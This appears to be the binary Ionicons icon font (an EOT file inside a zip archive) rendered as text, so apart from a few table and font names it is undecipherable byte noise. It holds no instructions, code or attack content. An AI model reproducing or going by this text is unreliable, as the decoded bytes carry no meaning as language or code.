PK!�?R	����,it_sanctum/fonts/ionicons/fonts/ionicons.eotnu&1i������LPG%4IoniconsMedium Version 001.000 Ionicons
�PFFTMm�	���OS/2A9a�X`cmapmn
8�cvt D4gasp���glyf�"&��pheadk���6hhea��$hmtxA
I�~loca��)�8�maxp<�8 name��n�l�post�������4%G_<�Ц3�Ц3�������.��r@.|�LfGLf��PfEd������.�@ ������@��`��`�@���������������������`������  @�����@����@��������� ������N�� ��������@�����@��������������``@@��������������������������������@@����`@���� r�@��@�����@��������@������`��@��@�@F�@^��������������`�����@@�����`�����@��@�V����*��������@�@���������V����@����������`���@@ ��@@��������@V������V���� �`�����������������@�@������@���`���@���@P@`l`������ @����`������`�@��`@� ����@����������������@����@@�@�����������������@@����  ��������������������������������������  ��@@`������``�����������������������������@�����  ��  @@�ll��������@@�@������@@������@@@@����������������  �����������@@������@@@@�������@@``��������  ��@@@@��@�����������������@@����������������@@���2 �7�:�D�K�}��������������������������������9�=�G����������������������������
���?���Q:765/-*(&"!	
�D***Rd���� HXv������Hf��$r��:Z��
Z���.Pr�$R���	&	�	�	�	�
X
�
�
t���$n�
f
�
�"6|�.J��Bf�(`����d����6r��0�h���&V��(Bp��(Z�\�X��N�6v�h� 2 � � �!8!~"@"�#$#J$$�%%R%�&0&�'J'�'�((�(�))n)�)�)�**R*�*�+"+R+�+�+�,,Z,�,�-&-V-l-�-�-�-�-�..$.X.z.�/�/�0,0�11~1�1�2b2�2�2�4`4t4�4�55l5�6626�6�77�7�8T99�9�::z:�:�:�;0;X;�;�<*<|<�==�>>??�?�@Z@�ADAtA�A�BB�C<CxD.DTD�E�F�F�G�I�I�JJ2JbJ�J�J�KK4K�K�K�L&LLL�L�L�MMM:MJM�M�M�NN^N�ONO�P*P>P�P�QbR&R�S"SfS�S�T0T�T�URU�VVhV~V�WW>W�W�X2X�Y0Y�Y�ZRZ�Z�\.\�\�]$]�]�]�^^6^T^�^�^�^�^�^�___$_0_D_z_�_�`H`^`�`�a$aha�a�a�bb:bfb�b�b�c.cNc�c�c�dd dJdhd�d�d�d�eeZe|e�e�ff�f�gg2glg�g�hhhlh�h�h�iiFini�i�j,jVjrj�j�j�j�k$kBkjk�k�k�llLltl�l�m:mjm�m�m�nnFn`npn�n�oo&oJo�pp�p�p�qlq�rDr�s2s�s�s�tbt�uhu�u�u�vvv*vNvrv�v�v�w�x�x�x�y�z�{T{�||V|�}R}p}�}�~~p~�~�
J����>������T����2�Z�t�΃��@�`�����̃��2�X����B���چ���·�6�.�ĉ\��6�r���Ћ(�z���ʋ��6�V�p������X�v������@���ҏ�\�����V�r�|�ȓ����ܕP���d�ڗ���b���ʘ��\�������8�j���֛ �8�f����ڝN����,�Z�������0���Ҡ�,�x����J�|�����ơ��>�b���Ԣ��*�N�f��l���ޤ��
������,���J�6���H��v������,���̭���.�N�x���د�J�|����f����h�����Ҳ�2�^��:�Z�l��p���Ĵ��v��N�p����������ĸ�
� �v����R�ܻ(���Լ&�Z�콎�̾���ֿ$�d�������@�^�������L���2������4İ����JŮ�N����>Ƕ����B����F���l����<��.�N���2�xϞ� А����8�U.�/<��2��<��2�/<��2��<��233'3#�wffU��3��
%#!"'&7625#75#�	�^	�@@@]		��00P������#53'#3���`� `@  �` 7'3533#!"/&?332376;'3�P`PQ	��	H*>2�3>*�t``i
CC
7>-->��3'3533��p�p���`@ &5463!2"/

�		�		�		�p%#"/&4625462762	i	
	j		22	}d		d		0�

�0	��573#�����p�p �`632#"/&4?�		�		�]
��
�		�7`I6232+"/&547m		1�

�0		d		@		22		j	
	��%5#535������p�p �`7#"&54632		�		�#

�		�7`I"&4?#"&46;'&462�d		d		0�

�1	@i	
	j		22	��##5#��p�p����`@ %#!"&54?62=
��
�		�y		�		�p7632"/"&="&4	i	
	j		22	d		d		0�

�1	����a�%#"'&'&'&546767632#"&5##"'&5476767632373327654'&'&'&#"32767'"3276767654'&'&'&�$b82-+$ -+/*N<$
	&)		6#(

 !'/& !�	

		)%$(+/0R0H1&	
+


q)$		

"#* 
�





����
3!3546;2'354&+"!#"&5475#"&5475#� �@ @I33I�6&&6\x#�# ��@3II3&66��$

$$

$@�@7"=43!232+#'37#


}
%

%
�d=d=@
�

6
l
6
�oQo@�@2+#!"=43!25+=!!=3�

%
��

}
 ��Q 
l
6

�

6`@  �  @�@2+#!"=43!2�

%
��

}

l
6

�

6@�@2+#!"=43!25+=#3=3�

%
��

}
 Q 1 
l
6

�

6`@  �  @�@7"=43!232+#'#3=;5+5


}
%

%
� �  @
�

6
l
6
�  @ ����/:E617=432#"=&'&?65'&'&76?64/&?64/.DuTTzDZY�

0A�
qQQu
�@VU&O
�O
����48"&=462"&=46272#!"54;26=3326=!~�H�P8&���@    .�p�))))��� �` $,2#!"&=46;76;21264&"624"2"&4~��E'	T
)�L66L6��:)):)-��(
)�7L77Lo):)): �`!%)-2#!"&511463"!5&#275!375353353��x�����`�@`�� �tt@ 00����$,7"&=463!2+.#6"264&"264&"264L ,,  ,, OYrr0)�**�)@6
�����7"&=463!2+.#L ,,  ,, O0)�**�)@6
����.7+"5#"&=46;;22+'&+"&=463�Z5&u	s%%K
e%R-0�e"9#�#@<#bF"���� (0"&462'&#""#6"264&"264&"264�Vzz�z!T%Brru�vvS;1X�����"&462'&#""#�Vzz�z!T%u�vvS;1X����77&15&547327#"'#&#"742'&#"#"&547>1fH-F8�HfEHe`9#*@*Ec5?\cE/+JbE9L����$2"&4654/&#"&'&#"27������So,N�������*K�'./&466�
�

D c�
�!��

I"""
k
��#"/&54?67632632���P�R���N@�=7176"/&?6��
���������7/&4?6V���	����
�����71'&?6/&7��	�����
�C�@7/&?62/��
��������`�>BFJN6?6=4623'"32432+"&546;+"3!254+"&=5353'53'53P&`

���I%	%�pp����� !!`��h

��G

�  �  @  @  ����-2"&4'76/&#"'&#"2?32?654������LKLLLLLKL�������KKJJKLLK��%"/"&4?'&462762v
������
�=
��
��
��
���%%#"/#"/&4?'&?6327632|&��&��

%��%

�=%��%��

&��&
	�0�P%2#!"&5467>32>32n"00"��%5"!9"0C�1#"16%/	%E1{{%'76?#!"&546;#"3!25{

 7
B7�@� 
��


� �

	\
7 

)7�@  �


2

 
��

����2"&4264&"&2"&4264&"�P99P9O$$1������fHHfH!9P99PT$$򃺃���HfHHf � ,8DI+"&546;2;2=4+";2=4+"54+";2754+";2'3'
	�		�T�GG{{��� ��/<G�

P
\

�

M

�

NNB �!+"&546;2'335#"&=#	�		�S]:��C��

O	\6?��RP05!5!5!��  `  `   @`
%!"54?622#!"=43/���		�����		� ((@�@=&'&6;2"'&76+"&=46?27676/>
	��	
����	,ASbbR@,+ZV��	,
]SS]
,@�@'2#".'>264&"7327"&46;�nr:$;$<<""AeJ55J5Z

,@�0,#A?�6J66JE,
 `
$2!546372#4>3#!"/&6?!5=��	�����A?	
!
	J��
  ��$%2#!"&=47&/&7%6'7#'#7�		��	
	r	���3>?32�	�		�
-J.D�:$::$:$����@F.546322#"'&"'&'2327'7654&'&'&"'&'&#"7#73s4?�]#!5?�]#! 1)		6-4$7 2)		7-5$%&U�&Ui>]�	i>]�(-60P 5(6-61Q 4)�q�q��@�537�3��3���� �`!2#!"&/&3%!47>;2;2n
��
X��K�
�

�1!3	
0�P7">35�Xc%!-U4���&@G7-P����+3$&&"&'6&&'654'6776'67277264&"[%"	L	0&
%%	"	L	"�P::P:�D%%%
&0	&"&
%%
&�:P::P��'/%#'#5&''7&'#5367'7675373264&"�, 6!L!6 ,+6L6+�,  , � 6 .. 6 L6
))
6\ ,  ,	 @`#/;GS_k+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2@22�22�22�22�22�22�22�22�22'22222�22222�22222���N%#"&=4632676'.'&/&'&'&#"632#"&'.767676762 "	
!"
	" 4
&X&	4�'c0 #j"!



  #j# 0c'Y8
8��'&4762762~""��""WV`#e#��#e#   ����72"&46&#"3267654'&#"34762;25476?6�������

1&1	"	'	�������
�!
1
		���(1+"567>?67654'&#"#47632.>�'	>
M,.=B(s5	.
	 O��**��
%##5##5#7�0```0���������.$"&46272#!"&54634#!"76322?632d(($�x!c
��~	6
�((���H�j���;��)IS'%.?&/&67%6>3'#5&#"7754#/"?63232?632'"&4632�


��

	
	(	
��
���
U
:�
f	+4	��

.�
6
	
	�f�
		?�m1!A����%&'&676&"2645#5#3#��]]��]]��B�]��]]��0��������	;#535#53&"&462` �  `((�0((����15"&46326326764'&'#"&547&'&"27&42x(z�zzVE6

?4

$N$#44#$N$��;6EVzz�z(
��4#$N$

4#$N$#4Q�� �43!2#!"56254&#";254+"			��	�	b��w		��		#����#2+"&5463;24+*224"7#�

�

8  `��
��

P
 �� ���+62"&42+"&5463264&"75&'#;2bt�6<**<*�
��
�
��H��*<**<�v
r `!43!25!5!"&�@
�
 ��@7d�dV��
���5�(%''&'&'&7665./�
*6Y$J
%ge),,
-U9,
35OE
 C�V'!n1
+*%5.0`�  A?2+"'&=3;26=4&+./#54&+";#"&=46;2�p!//!p30p
0p0!//!p)�0/! !/0   0   /! !/��2.54264&"FbG<)`."".!�F23�)(?=P 2l!."".����*"&=46;54631232#;54'5&#1"	

	V>>V	

	���(( 
	�	
E\\E
	�	
2��N�07>54'&'7/7'>767574&'&5�%1
/!=1L,~?1L,;%1
/!�:9'+,85T9C'c6T9C'3::&
,.6����+"&4622&=#&'5+&5#&=46;d  %U  r
		
i��

��i
		
r
�~!3HT_emw�#"//'&54?676575&'75''&#75'7>753"+5'627''6767267''5677./77'7'77'�aaaaiab�GgII
iII�G��
�
_�




7	��
BBBB		GBB���2�21�	
m1e
�1mw1pr�1X��.		



�� �'3546226=462#"&=&/#.57462"&5>V>=/		/=C-@..@-�)>>)1K
::
K1� ,-�,,���� BJ2"#+"'&'"4#&'&'&762#"&/4.'54;32332726;754"264*k
			� 

��
_|Q!!���+2#3#3#3+#5#"&=35#535#535#5463� ;;;;;; V ������ �%+%+%*MM*%+%+%����2"&45!������`�������m  ���%2#!"&463a

��

����=!��@@��#2#!"5435!#"74>57;��V����\#	--	���
���
-)
	���6"&462"&462"&462G**q**q**�((((((����'2+"&46;5+"&46;>?6j	

%<�
%=��	��'*�&�*
! �`#%2#!"&463%2#!"&4632#!"&463a

��

B

��

B

��

���O@/=!%5!5!@��@��@�  `  �  �x42#"&=476#"&=46323276=4'&26=4�! 0"."%�'/)�&$���
�	

	�! ��7+"54;272+"543`HH�Hh��h��<%#5#53533#+476767>5454&'.'&65&'&62�*33*33
��M,\,/Mx3*33*�	
	55	
��4d%#4'.'.'><54&'.'&654&5&62+4767>54&'.'&65&'&62�3b
<
$��A(
%N&
A{ZG

		
$%	
�A

/0	
#��0!+476767>5454&'.'&65&'&62���M,\,/M	
	55	
����,7''74?46'&54&#4?65462/&�3DD4>�	��	�>�J!  !J
1�?299q�1
@�%#"&546325���		�X����2"&45#5##335������`p pp ������m pp pp��%2+"&=#"&46;5462a

��

���

��

���%##5#5353��@��@�@��@������7#537#53733733#3##7##37]]e
ck@j?]fck?k?jj`6T6����6T6���
TT����#'+/32++5#"&=46;5!5#5#5#535353�!"(�("!(�������@�pp#{@@����P00@�00����"&462&�zz�zz�zz���A%'3.#"32?#"&'4'=41'54&5&=4746=7=65>312;3`hJK25KK5*!+6?CiiCY,A`p0@KjK.)TAATP#*0�P2.#'77+@$B9�����RR+==A%\����9OD:0�P%.#'72�%cX��4U.0@&\��P+==}�%#"/#"&462&"264}+T&*A^^�]aP99P8=,V]�]]B*$�9P99P �` %57#!"&=4;#7"4>35 &��x
:�=A"A+��F;m���(88,#<``��(7"+532>7>;55&'#53255#"'67>73R!-3//$
,2QQ�#'//>3
�QQ@5$*
 +?
%)6QT0%#?0
r/TQ65$' �`%3276327632#"/#"/+"54�
vv
�`qz
?N��N@
zq( �`#2+"=#"=#"54325432543t�ww�`��qz@NN?zq
`�<DPXdq���%#;2=;3;12=;57++"'&=#"&=#"= "2=&2"&=4"2=&2"&=47"3&/&#1'36;273#>7'7"&46322"5432�1

	1���
#	�	#
G�	b
�<Y4444YLLZ3
33

3ZL``
`

`
``
`

`
`)(		
&J
		

	`�(4IS\753++"'&=#"&=#"562"&=4$2"&=47#67'4?63272254&#"3264&#"@�
	1�����4{
	g		
�LLZ4
44

4�
`

`

`

`
e
'@		H
		

	
@�'FPY"#"'&#";276232767&'&'&767&'2+"&#"+"'.7632326'6767+&76�
0		)
$##" 
0-
,
!
230-

0'@<852p0F

' @�'2+"&#"+"'.76323267+&76�)
$##" 
0-
,
!&'@<852p0Z ��1=Ua&4?62"'72?'&""/&47676276767'"/2"/&47676276767'"/2�������
���{y��{

{�
���{y��{{�
	RR	R�KKKK�
QQ

<;dK	;;	K	RR	;:cK	<<	K��'?&4?62"'"/&4767627676"/&4767627676������{y#��{y	RR	R
QQ

<;u	RR	;: �`1;B'%#'32654/3'355'5+/+=+'+327654'2+5A�)���?#*%)?$�w%	!)��'(.5g��wɜ-%kbbT�\/S2*
|�9-,Y �`'3#'32654/3'35+532@f���?#*%(@$�((/5fvʝ-%kccS,Y��,8@2"&4%6&'"67&327&6767&'"&27&'&'767&p�pp�p:<86� 6-�@A8z(&T	<N�
K ,�B;(	�p�pp�%
5`9!%!F4d=-G#�
*% "@"+I#��%.9E2"&4264&"7&'67"'&'63264&'&'6'&=67#"'676p�pp�p~�^^�^�(,!
+]5<�($^@(L:		.#!9�p�pp��^�^^�K
 #X
"
(8o3  	3$*"-
�s!%)'7''5'7'75/737'7'77'qOrN4V5�NNrrNNrObbOq4U565U4ONrO4V4UsBG?*5.u?3'ED'4?GB;;B5,7,,8+P?GBB4*8
�s'7?7'77'5qOrNNrOOrNqqNrOOP"rr"sBG?}>FBBF>J�?GB�BDD��13##5#53546;#"7+=476;5#"+;3=3�@8S--*18"*-	(,3@��@+*+@V %
 #+ ����3##5#53546;#"�@8S--*18"@��@+*+@����?FQ�2#"54654'>54'6'#"&"&+#"'&'"327+.54"'=7&'3276467654'&'&'&"&'&'#5&76;1&547&?2632631263236���VC.9
"6"
8.

DU�!
�(((R(( 
(		
%""\��_Kx+/<$  $</'wL_��		I:9E.&$ !#&.E9
!A& &i
3����?2#"54654'>54'6'#"&"&+#"'&'"327+.54���VC.9
"6"
8.

DU��_Kx+/<$  $</'wL_��'7FR#"&54767&547"#"&5476;"&#"32654&'654&#"327%##5#5353�$+I>59(E'. ":j!D,2)$'
#
"NPPn&'!	
	&9*&
0'�$#w
 <
;DQQNN��)9IU7#"&54767&547#"'&5476;#'327654'&#"4&'"&#"32673##5#5353�JA8<*6*#%9�<

k

	y&,$#�NN"PP"�(;.(!*!
z

��"QQ"N��!!!3#5'3`��@ ���-@(B/(`��`���_xHHxT��!!?#'#3����@-&(/B(����xTTxH��"2>7#53'1"&54622#54#"#53672#!"&5463254#!"3w77
�#777~

��
=��@�

&%d^%
a��
��

A
��<����02#!"&54635#62654&"54&#"5#3547632a

��
V7#77�
��

A
�����

�d%&�a
%^��8LZu~�%42"'42"%#"&547&54626737632#"&5'632'"32767654&67&#"6=&'&'.'&#"327654&#"#"'732@@�@@BtRSt(
7JVEL5
J��	
Q2	5MN5	25NMs
	u
/0
)(�   E	:PP9

&b&M&
���"1	%%	1"%�	n��+4<FR\e%"&547&5463267376;2+"&/63267&#"$264&"2654&"27'#"&/62654&"7654&#"�u�t7JZCL1�a
O	

�a0
( 
e��	9QP9

&g&J#
)
�


�
}P


��#+462"&4264&"'2#4&#&'.'&'2#4&#3.'!.!!.!(  i�P`P�D*%(Jb���P���W0ˏ}p!.!!.?  ؗiP`�)$*D/bJpៀ�LW}��0��62"&452#4&#52#4&#!.!!.!i�P`P��P��p!.!!.��iP`�ៀ���$@�"32?32654/7654'&#"'&'2632#"'#"&547&546#"'&'&547632327654'&'&'&'&'&54767632#"'&'&'&#"3j+
X?	+,+@

Lk>,Lk>�#'



"		


`+=X	+
=,+ iK,=jK,=��
		
	
	

			

��m%#"'#"&547&54632632654&'&'&'&/&'&5463232654'&'&'&#"#"'&'&'.#"3276u>,Lk>,
LkY		
!

	
'#�,=jK,=iK?		
			
			
���#G727#"'&'&'&=#567676733#5#"'&'&=35#5#33276�!"0>``B`` 

04A	�:+p@e&	
#

	(u p�	
���#727#"'&'&'&=#567676733#�!"0>``4A	�:+p@e&	
��*l#"'327.'327.=3&547&5462676>7*#'6?#'&#"'&'&'#"'#332767676='��}PDC52	
!-+
Mz8R 
!!	
#"/=9&%$!
8"==
'-#!**=3.#Ri�,*%5#5_)8#
0!%+
"'!3..��*#"'327.'327.=3&547&5462676��}PDC52	
!-+
Mz8R 
!Ri�,*%5#5_)8#��=�#"'&'&'&'&'&#"'767323276767654&'#"676326'&'&#";#"'&'&'.'&'&+>763232767676�
 2#" 

	R (&
"		
"#	


"
		

%!2N.3*-E !'7O	G&a
&+	
6|.)	*+

H%
X-$!E)�4'&'&'&'&'&'767676767654&'&67>�
 2#" ,

	
R 	 (9"N.3*-E !&'7O	G&i&+	
6����%#7'5#7'5%37#537#5���� ������� ����� ��$�x������ٶ{�������%'5#'5%#5#5��������$����ٶ����
IU2#"&4'674/3277654'&546;&#"2372##7/"&63372#67654'p�p	\@	Pp6,S�5!>
2B]3.

?&.
5I
'�pP
@\p�P2T� ��`7��: -M�qJ�*S,'!q��b7"#"'"&#7'23"&'.'&54%"?6=.#"'726&##'"33'726&#+67632�5		�]0?n9+'

>-		&?"9]#"2#��I��U5
%,'*
0OAq! :�Jq�	H
.@�#27&"5'2777#"'/+;=!
�
,
�
,
``
Xo	ZY	o|ի����ȸ�����@�27&"5'277!
�
,
�
,
``
|ի�����4TW+"+"1;;1327;276=6514'=4&+&'22#+"'"&5&5474636;5			Ddh><jI_s7++I__I+*SW	1�`3653

3563 /"6656"//"65#H"0���c�#"'"&5&5474636;227'�+M�M+*Ia		aI+�ґ�+6j6"//"65#H"//�bc����	%'7'37��7��7��45�h�pp�h����2#!"543u�����j��*.7&547&547&546762353#5&'.>5#"&54$"25I
7pp(
$g`  �		

 �*B
� �|*.%'"&##5367654763224"h5I
7pp(
$g��  �		

 �*B
� `�!)-153#+"./&/#53546;2#354+"3'#5#37#[	

�

	[e��[
^T
@ 	�
		

� �������>�0#!"&?6?67>;22+"&/&63>��5g5!�;	

4
�
�	����'"&=46;546312#&'5&#1"!2#	

	V>>+
5((		

	 
	�	
E\.42
	�	
0�P%2+53'3#"&5467>32>32n"00"n0PP0f%5"!9"0C�1"#1PTTP6%/	%E1�p27'#!"=4;54&+53232264&"#64&";Oqq	��		���&4	mD_B#YX#A		7�	&0& ���
7'#537'64'7'64'77'64�_hh_8!"++0??:(X�X�&\&.l\9�9B�W�WO�( X
7'#537'64'7�_hh_8!(X�X�(X(.l(rX
7'#537'64'7'64'7�_hh_8!"++0(X�X�(X(.l\9�9B�����3?'#57#"/.54632654&'&'&#"#'327'5�//A�5?�]934?�]92!3) 6-IL$ 1)7-�3�3N�i>]�i>]���.51Q J#-60P M��@�$#"&'&'&=67676?622654'�(5 ^B*G?');
J1�2N^-@Y% 
Tc.�~;)1G

 �`".2'&"/7'&"/767312/7632d�Z

 
	E�E	
 

c
!	
(d(
	!
9K	QQ
4#
5`T
	 
	@@	
 	
L

 	##	 

3�
4



4����%->73&/##&=#&=#7#&76"&4620	.+
*-�+h

`�				�`

�   @`
?'3'77#7'#5?'53�@2�2@@2�2d@2�2@@2�2�@2�2@@@2�2@@2�2@@@2�2@�@	=77'=�k��k^>@�=�p��kb>@�@	%7''77 >^k��k�=@>bkˀp�=�@�@	7''5�>^k��k�=@>bkˀp�=�@�@	3''77 �=�k��k^@�=�p��kb����%5#3'35#'735#7#35�`mL``Ll``lL``Ll�`Ll``lL``Ll``lL @`3'#5?��2	�2�2�@`�2	�2�2�@ �`32#!"=4;5#'�������`@�0�@` �`5#32#!"=4;5�������`@�0�@��
#57'537'3'77#7�R2�2RR2�2��R2�2RR2�2dR2�2R��R2�2RR2�2RdR2�2��
54;55#"5%+'732���������x@``@�@``@����,<3+"5754"2&24"72+"&54&'46343!";265P���e
&�&	#���
�H00P���&&3
0&������+6D`����2+#!"="&=&54626326326322=4"764'&#"3275##"'#"'"&#34237654&#"#&'&#"#"'.5&'&#""'&#"3=2767676327676323276546;254&+326$42242�&& �&4&8
#(		P�


		0D  ��� &`&P�6&&�00LH 	!
 	W
	"# 
		

�`����2#5433'���`�88��0��`��!/753#!"=372#5##54;5>;2'54&+"35���P��� �xZ Z�����``��@�#'+/37;?CG2#!"5433535355#75#75#75#5#75#75#75#5#75#75#75#0��      @``     `       `      ���`��  @  @  `  @  @  @  �  @  @  @  �``�  @  PPP����GV2"&467'767#53&''7.''7&'#5''3#775367'77##"&54753������X 
  
 ())( 
  
 ())()u
 ������� ())( 
  
 ())( 
  � 
DD	8�H&7H%++'+/&1"5'&7625462762"/&4?62"&4?'&462+??#		#�pp__�__pp�??"v

v"xpp____pp8�H-642242242"/&4?62"&4?'&462�000�pp__�__pp�000000ppp____pp8�H!6"/&4?62"&4?'&462�pp__�__pp8pp____pp��=I%#"'&'+"'&'&546;.54673654.5467322654&'?%&

f)
e#'8	9L�-
$2C, 
$ 5� "	����".2"&547&54632667&#"64&"67>7�]����& 3�

pp�pp�6<6<�����]93 &@

��p�pp�p@�
4�	4 ``=335335333@ @ @ @ @@����@������
2"&464&#������0ppP��������p�p�������&'&5'#5674'&$2"&4767>7>7>&546'4'.#&'&7>7>7>763226'&#.'&'&73>'&5&'.'&54323&'#&'&6'+"&"&76'"..76"'&?6&54'&'&'&76&'4&76'&'&6'3E	;�𺃃���-&
				
	 	

	

	'
!	 	'B
9��������
	!

		
		



5	5|/��@�	2"&54ndnW�W��Z[dd[Z���73##5#535.5462&264&"�@@@@@*6KjK6kB//B/�D@@@@DE,5KK5,E!/B//B����!67'&"1'54676'2+"543j
	c7I,c1+�
1=#�\Q��P�����.#1"'&574'&54>7332757332=3N2%	
%		
	+)�
	
�)&-	u
uu
uk��@�;2+"=&+"56=4?4&'&'>7632327543:4
T	
(#	&!42		�T

8F*ej_F  3	����!*32"&4.'264&"&6767'7&'&'67'�������4'�P88P84=	j4'�4=	������&4=	�8P88P�4'=�&4=	m4'=��@�-7!+"&54?675&54632>?632 ��
�, 	/(8��3	 ,&8(��F�7'''7'?67>?�5JI5hr	
rP
:	77	:
#5g�(�g5����?G7"&5476746=4&=4?5?5657454/&=4?6=4'5/&=47632264&"�08P80		7�6(88(8Q>���@�2#1"&54674&5476>

 6��db$�A^�/?"5&47542"=&47542"=&47542"=&4742.  `  `  p  ]*��
 
�
"
UT(�S
$
��
$
S��$

$
�����b2+"'5.'54&'&54#"#"'&'#.+&5475654'5&5475654'5&=<6;KjK-Z-�

	

r�I3	
[77[
	3��
��#4242642&"&46424242&42����`��* W0�@�P ���``�;**�  y007@@(PP����#/;GS_"&=4622"&=472+"&463#2+"&463%"&4?62"&4?6"/&462'"/&462.�`�`		D		�	D		C	�		D		�		C		 `�``r
		C		�
C		D	M		D		�		D		����s%'&'&4'&'&'&'&+"#"76767676767676767465'&'&'&'&'&'&767676767632�$  #$(%$		%"'%& ! &$
#! 
�			"	!%
& 




	



""
,��)3=GQ[eo%2+"43"+"4;2"=2"=&?6'&?6/&76'/&76&?6'&?6/&76'&76'pP�PPP    UEE�EE�((�((y((_((�E�E�    `PP PP�((B((1EE�EEiEE�EE
(l(���� 2#"&'3264&"#>7#53'7�]��]Gr"8�pp�8"r4��4[[����P@8p�p8@P��4 4[[���� %7#53'773#"&4632#'&#"32O4��4[[)a8]��]8a)8OPppPO|4 4[[-,4���4,8p�p����3:A2+/&54756764&"#"'5&'&54&'767'i�i2	
CbC
	2m
*+�
+�m[@@9
A$7jEEj7$A/B<D[��7+17=+/3����'"&46327'364&"�?E$g�ggI91E?��LLhLL?E19Igg�g$E?�pLhLLhL��%12#!"54;5>;2'3=4&+"5#5##335��Px--��--�@@@@@0�� �@@@@@@����!�����@����"642"427'65'"'632&.5�```� O!@P6;<5QQ!O4>�````0(&'�&@	��	@&�d>����74&546323#&'35#"zV�-)�@2NzVc�Vz ��2@�)?cVz����-7+#'#"&547276?54/#&546;2#�$	QQ	$

\

�%
��	%
vv
����2"&467'57.'#'73������7b??bGGb??bG��������bGGb??bGGb??��`�
":'&7632264&"264&"6264&"7#'&#""/&547632;��=NL�RR�
	DOLG	
MYX>��@
Z�`�			!����86"&=4627"&5467632264'&'&'&'&54632�[/6���6/	/^�^/	����b:]��]:b	/�^^�/	����"%/&'5'54?6;2$264&"�		�	�
1d��((�		��
b
1
�E((����;I%64'1/#&#'#"76;235/&'5'=4?6;2327654&#"��
Z
Z
�,l
�	,Z
�
��
�+m
�
X-	1
 �`8M642&&'&47674&'7'6%&'&'&4767674'&'7'67���%%�%%�� � 
 ���Z40

&t&

d40

&t&

J(%"
'%T%'


:P%"
'&)*%'"�n"'&#&'&'&'&4?'&?.#"'.767676765'&?6/"7676'4'&?6762?�'7	$k2,1\!a	
2
!&$0)6
%'`374b"
]
*
0#-	2	

!%	9'	0*��@�L�����#+=#+32#+;3=;3=36767676'&'&/767676'&'&'&/57#5##5#7327676=4'&'&+535335#5#57"#� 	H
		
C	 .+
	#( )WW)    H

�000	�
0001		
??	

A@@@0�
0@@@vJJzZZv
	
	6	
	��@�59=ER$#5##5#732>=4'&'&+5353353'3535#76764'&654'&'&'2762#( )W		W) (
	�    H	


�&!
@@@@0�0@@@@	cJJ�ZvB		�	
R����J2"&464&"46?&5463232654&#"'&54632#"&'3������0pp�p8(1,1=.VJ>PC6��������p�pp�8
z!	"
E2&/?,	C5WM4CV4
����B2#"'6?32654&#"74676'&54632#"&7>54&#".54����]"'6CP>JV.	=1,2(<J����	 >VC4MW5C
,?/&2E
"	!	hnD]����Ve"1/"#.'"547>;%#"/.'+"=>?4676.'&5467;67263632654'&#"2'2&."�	

J
	M	/!*VM


:' +3=&23%	
"#/	,"	
:3.�%43%%34%! �`>%"&46;&2#67#53&''7.''7&'#5''3##&548@a��$  ())(
  $�T�]2.,,)(
  
(),,.2]����4&#"312765'4?>5�$%

	

	

 2NN2&�
		
�% ``73#53353353`@�@�@ @ @��``��������7"&547462#354"5#75#!/B/!(>p)!//!*22� @@����7%#7.#"4&#"#"&542326=.#"4&#"5467542X�Wy0% 
yW ���Y -�&
� X���[_cg?"&=47654'&'&'&'&'&5462132=4'#5&54627>7675'&546224"624"24"�
:
*	
	&
'�  `  `  �\!("


	
�
	� 	
^ ` ` ���1AWbp7#'4767676=4.'&'&'&5476;2'2?676'#7"/&'&'&767354"32'654'&"2�	
-R`-�;'
�	v
B
��^	

^$3VW2$)B).>(c

*
(7����!'&"&47>'&76766'&�@
�
'�2&9
7��M$
�'
�<488
����	@x"'&'62&'&?67&'"#"&46;76367&'&'"'&76>2#"'&#2'&7&'5>7>?67&76#2W	%l%	/��A'=+

$


	J

$

+='A	
A%%?O",�3 +/ !

o/+ 3�,"

! ����
'?'7>}�[��	
-[-
	��Uu�[�	
-[-
	��U ��@�5=E##5#53533"&5475&546267>367>&"264264&"@0@00@@@6&4&  &4& 

 �.p@00@00�"+	&&$�$&&$����p%�����%+"'56274%36+"'&'=%#&"#&#""&#"'"&#&"'4'&54&547676767"&"#"'&547676>767676327&6#"&"#%76276&'&'&"7&'&:>232>>'.'&"275&6262376�+
 
�	
 
+�
 
P6Q
 

	
,001/,
	
�V

0�0

(3N3((�
	#B#	
��(9

f0

07			

	a8	�		N

\
	����"3DGKt�%53!537#"'&"'&'#.54632227'27654&'&'&"'&'&#"'353'#54'&+"'&7'&'&5463"2;2#4'&+"&7>'&#5232H��Z0r5?�]#!4?�]#!\7-� 1)		� 2)		6-�** (		
 6&	�0000�i>]�	i>]��� �-70PG-61Q �*000[
)"����5%''7�ppP�P��S����@pp�aC����������!6'.7675'#"&/3326?''>./"'67676=&'.'&476?.7>7>7654&/66'&667>54&�			

��

 .'
			-1(.$��!6	M;
(



%

,	 	
	
	

"
	*A	�;-&#��~�_�.7?f674'&#&'&'"&'.>'4&4&>32>76&6&7>767>76'4&546;26&/.'&"37&76476'&'7./&54'&'&'&'&76'".5&7627654&"&#"6'.7&'&767676'>372/&'&76'7676767>7626'&+72'&#>'.546'&##"'&7>��

#,
!
	

#%�


	
'	�	
		$	
	

	

	
f7�		

"[��
		

 
%!	"(
0
&H		
V		"*	

	





)




��		
	#	 @`%##5#53533@�*��*����*������#!"&54?63!27#5##'!'!�
��
!

�Q\Q =��\
��!
'

��..�Vk%!'7V��w��x�*x��x��%#57332#!"&546;5335!0`@0��0�H�а``� ��  ������%2#"&546;276k		��	K	
	/0]/'u	K	ԗ		)$	/]0/	��64272#!"&546;73264&"�~y��X � �\BB\Bi~~���  ��B\BB\��2+5#"&=432+'#732=X�Z9
�9Z�'���	YY�?	�	YY'�+*U''7'77*wwwwwwww7wwwwwwww��	%!>722"&4267#->
��
>-"R`nMMnMe>2�n:&&:&MnMMn�#��	"57!>72&2"&4267#&'67327'&'632#"'673267�!-	��	-!>JV??V?Q2(	�	�"
C�
2 9+??+(	h
;##;
�>X>>X}j(
L�;1>X>	 �`%#!"&5467>32#7#5#�'6;)��2F>-G+6R�DddD@�9();F2.D%,EgddL �`32#!"&=463�+���`0������7%#"&'5'45'&>65'&>235462?>?6�`-7)@:
"
*�g"0%�X������*��%#!"&5463!2!'���*��J*`J+*�`�`����'2"&43##5.'#53>753264&"�B//B/!!`C*C`!!`C*C`�|WW|W/B//B*C`!!`C*C`!!`�W|WW|�p2#!"&54635'���e���p��
[+uu+u��@�6"&=46273#5.5326�8))8)4'P9.9P'HbH�(�((�#:WRRW:2BB����
